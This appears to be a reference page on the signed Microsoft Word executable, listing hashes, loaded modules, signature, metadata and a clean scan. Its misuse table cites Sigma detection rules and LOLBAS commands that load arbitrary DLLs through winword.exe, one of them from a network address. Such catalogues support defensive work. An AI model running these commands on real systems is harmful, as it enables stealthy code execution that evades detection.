WINWORD.EXE
- File Path:
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
- Description: Microsoft Word
Screenshot
Hashes
Type | Hash |
---|---|
MD5 | 10B777CD1CC2D94C60707FB53B29BB7D |
SHA1 | 2FA389B2CFBF11AA5F08609D019F1FD8B1233065 |
SHA256 | 75D216CDE89D62AE1F9A8137CE7EE32FEC7A1DA96826BE471E664223651720BC |
SHA384 | 3E5C6297573C09860420D92E4C280EAF7E00C2A268D7EFDBA697CEFDEF5F20424BCFD9DE3B531C5B243A01B6E4CD7BFB |
SHA512 | 7A1C1CC0B331F4C9D1F751DF4C9A4D09C495063E7A6574601CA1340A9A883E1158F6C17200546995D2BE5CA970F656E6B86CD2773EE25F71D923AE6C0FBE28A0 |
SSDEEP | 3072:UcQsVK2OKsuWoZmp4sVK2OKsuWoZEckAQckAIDpAPfKrss1yyKrss1yAZDvYbND5:1ErtkAzkAZqrEdrEAZUdwFjNNrFs |
IMP | E35903DD5F449996A8A560239CCEDAFA |
PESHA1 | A05CD068E145FA513273F2D3848EC1B00067E231 |
PE256 | 876102EBE47D74EB60C86F424D2077D7B53D2A62FDBE4D7F84F77CAA7E7C46C2 |
Runtime Data
Window Title:
Microsoft Word
Open Handles:
Path | Type |
---|---|
(R–) C:\ProgramData\Microsoft\Office\ClickToRunPackageLocker | File |
(R-D) C:\Windows\Fonts\StaticCache.dat | File |
(R-D) C:\Windows\SystemResources\imageres.dll.mun | File |
(R-D) C:\Windows\SysWOW64\en-US\user32.dll.mui | File |
(RW-) C:\Users\user\Documents | File |
(RW-) C:\Windows | File |
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627 | File |
(RW-) C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.508_none_429cdbca8a8ffa94 | File |
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 | Section |
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 | Section |
\Sessions\1\Windows\Theme64749523 | Section |
\Windows\Theme1120315852 | Section |
Loaded Modules:
Path |
---|
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE |
C:\Windows\SYSTEM32\ntdll.dll |
C:\Windows\System32\wow64.dll |
C:\Windows\System32\wow64cpu.dll |
C:\Windows\System32\wow64win.dll |
Signature
- Status: Signature verified.
- Serial:
33000002CE7C9ACE7D905ED2B70000000002CE
- Thumbprint:
B10607FB914700B40F794610850C1DE0A21566C1
- Issuer: CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: WinWord.exe
- Product Name: Microsoft Office
- Company Name: Microsoft Corporation
- File Version: 16.0.12527.20482
- Product Version: 16.0.12527.20482
- Language: Language Neutral
- Legal Copyright:
- Machine Type: 32-bit
File Scan
- VirusTotal Detections: 0/71
- VirusTotal Link: https://www.virustotal.com/gui/file/75d216cde89d62ae1f9a8137ce7ee32fec7a1da96826be471e664223651720bc/detection/
File Similarity (ssdeep match)
Possible Misuse
The following table contains possible examples of WINWORD.EXE
being misused. While WINWORD.EXE
is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | godmode_sigma_rule.yml | - '\WINWORD.EXE' |
DRL 1.0 |
sigma | edr_command_execution_by_office_applications.yml | - '\winword.exe' |
DRL 1.0 |
sigma | sysmon_cactustorch.yml | - '\winword.exe' |
DRL 1.0 |
sigma | file_event_win_script_creation_by_office_using_file_ext.yml | - 'winword.exe' |
DRL 1.0 |
sigma | file_event_win_script_creation_by_office_using_file_ext.yml | Image\|endswith: 'winword.exe' |
DRL 1.0 |
sigma | file_event_win_winword_cve_2021_40444.yml | Image: '\winword.exe' |
DRL 1.0 |
sigma | image_load_susp_office_dotnet_assembly_dll_load.yml | - '\winword.exe' |
DRL 1.0 |
sigma | image_load_susp_office_dotnet_clr_dll_load.yml | - '\winword.exe' |
DRL 1.0 |
sigma | image_load_susp_office_dotnet_gac_dll_load.yml | - '\winword.exe' |
DRL 1.0 |
sigma | image_load_susp_office_dsparse_dll_load.yml | - '\winword.exe' |
DRL 1.0 |
sigma | image_load_susp_office_kerberos_dll_load.yml | - '\winword.exe' |
DRL 1.0 |
sigma | image_load_susp_winword_vbadll_load.yml | - '\winword.exe' |
DRL 1.0 |
sigma | image_load_susp_winword_wmidll_load.yml | - '\winword.exe' |
DRL 1.0 |
sigma | proc_access_win_littlecorporal_generated_maldoc.yml | SourceImage\|endswith: 'winword.exe' |
DRL 1.0 |
sigma | proc_creation_win_crime_maze_ransomware.yml | - '\WINWORD.exe' |
DRL 1.0 |
sigma | proc_creation_win_exploit_cve_2015_1641.yml | ParentImage\|endswith: '\WINWORD.EXE' |
DRL 1.0 |
sigma | proc_creation_win_exploit_cve_2017_0261.yml | ParentImage\|endswith: '\WINWORD.EXE' |
DRL 1.0 |
sigma | proc_creation_win_exploit_cve_2017_8759.yml | ParentImage\|endswith: '\WINWORD.EXE' |
DRL 1.0 |
sigma | proc_creation_win_lolbins_by_office_applications.yml | - winword.exe |
DRL 1.0 |
sigma | proc_creation_win_office_applications_spawning_wmi_commandline.yml | - winword.exe |
DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - winword.exe |
DRL 1.0 |
sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | - winword.exe |
DRL 1.0 |
sigma | proc_creation_win_office_shell.yml | - '\WINWORD.EXE' |
DRL 1.0 |
sigma | proc_creation_win_office_spawning_wmi_commandline.yml | - winword.exe |
DRL 1.0 |
sigma | proc_creation_win_office_spawn_exe_from_users_directory.yml | - '\WINWORD.EXE' |
DRL 1.0 |
sigma | proc_creation_win_susp_control_cve_2021_40444.yml | - '\winword.exe' |
DRL 1.0 |
sigma | proc_creation_win_susp_msoffice.yml | - '\winword.exe' |
DRL 1.0 |
sigma | proc_creation_win_susp_powershell_parent_process.yml | - '\winword.exe' |
DRL 1.0 |
sigma | proc_creation_win_winword_dll_load.yml | title: Winword.exe Loads Suspicious DLL |
DRL 1.0 |
sigma | proc_creation_win_winword_dll_load.yml | description: Detects Winword.exe loading of custmom dll via /l cmd switch |
DRL 1.0 |
sigma | proc_creation_win_winword_dll_load.yml | Image\|endswith: '\winword.exe' |
DRL 1.0 |
sigma | registry_event_office_vsto_persistence.yml | - '\winword.exe' |
DRL 1.0 |
sigma | file_event_executable_and_script_creation_by_office_using_file_ext.yml | - 'winword.exe' |
DRL 1.0 |
LOLBAS | Winword.yml | Name: winword.exe |
|
LOLBAS | Winword.yml | - Command: winword.exe /l dllfile.dll |
|
LOLBAS | Winword.yml | Usecase: Execute a locally stored DLL using winword.exe. |
|
LOLBAS | Winword.yml | - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE |
|
LOLBAS | Winword.yml | Name: Winword.exe |
|
LOLBAS | Winword.yml | - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" |
|
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office16\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office15\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office14\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe |
|
LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office12\winword.exe |
|
atomic-red-team | T1055.012.md | This module executes notepad.exe from within the WINWORD.EXE process | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.md | FOR /F “tokens=2*” %a in (‘reg query “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe” /V PATH’) do set microsoft_wordpath=%b | MIT License. © 2018 Red Canary |
MIT License. Copyright (c) 2020-2021 Strontic.